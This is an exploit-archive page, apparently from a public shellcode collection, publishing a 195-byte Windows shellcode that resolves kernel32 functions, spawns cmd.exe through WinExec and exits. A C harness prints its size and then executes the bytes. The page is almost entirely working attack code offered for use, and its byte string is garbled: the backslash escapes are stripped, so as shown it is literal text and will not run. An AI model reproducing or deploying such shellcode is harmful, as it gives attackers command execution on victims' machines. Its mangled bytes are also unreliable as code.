[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
# Published : 2010-06-25
# Author : RubberDuck
# Previous Title : ShellCode WinXP SP3 SPA URLDownloadToFileA + CreateProcessA + ExitProcess
# Next Title : Linux/x86-64 - Add root user with password - 390 bytes


/*
Title: Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
Date: 2010-06-25
Author: RubberDuck
Web: http://bflow.security-portal.cz
Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32)
Thanks to: kernelhunter, Lodus, Vrtule and others
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(){
    unsigned char shellcode[]=
    "xFCx33xD2xB2x30x64xFFx32x5Ax8B"
    "x52x0Cx8Bx52x14x8Bx72x28x33xC9"
    "xB1x18x33xFFx33xC0xACx3Cx61x7C"
    "x02x2Cx20xC1xCFx0Dx03xF8xE2xF0"
    "x81xFFx5BxBCx4Ax6Ax8Bx5Ax10x8B"
    "x12x75xDAx8Bx53x3Cx03xD3xFFx72"
    "x34x8Bx52x78x03xD3x8Bx72x20x03"
    "xF3x33xC9x41xADx03xC3x81x38x47"
    "x65x74x50x75xF4x81x78x04x72x6F"
    "x63x41x75xEBx81x78x08x64x64x72"
    "x65x75xE2x49x8Bx72x24x03xF3x66"
    "x8Bx0Cx4Ex8Bx72x1Cx03xF3x8Bx14"
    "x8Ex03xD3x52x68x78x65x63x01xFE"
    "x4Cx24x03x68x57x69x6Ex45x54x53"
    "xFFxD2x68x63x6Dx64x01xFEx4Cx24"
    "x03x6Ax05x33xC9x8Dx4Cx24x04x51"
    "xFFxD0x68x65x73x73x01x8BxDFxFE"
    "x4Cx24x03x68x50x72x6Fx63x68x45"
    "x78x69x74x54xFFx74x24x20xFFx54"
    "x24x20x57xFFxD0";

    printf("Size = %dn", strlen(shellcode));

    system("PAUSE");

    ((void (*)())shellcode)();

    return 0;
}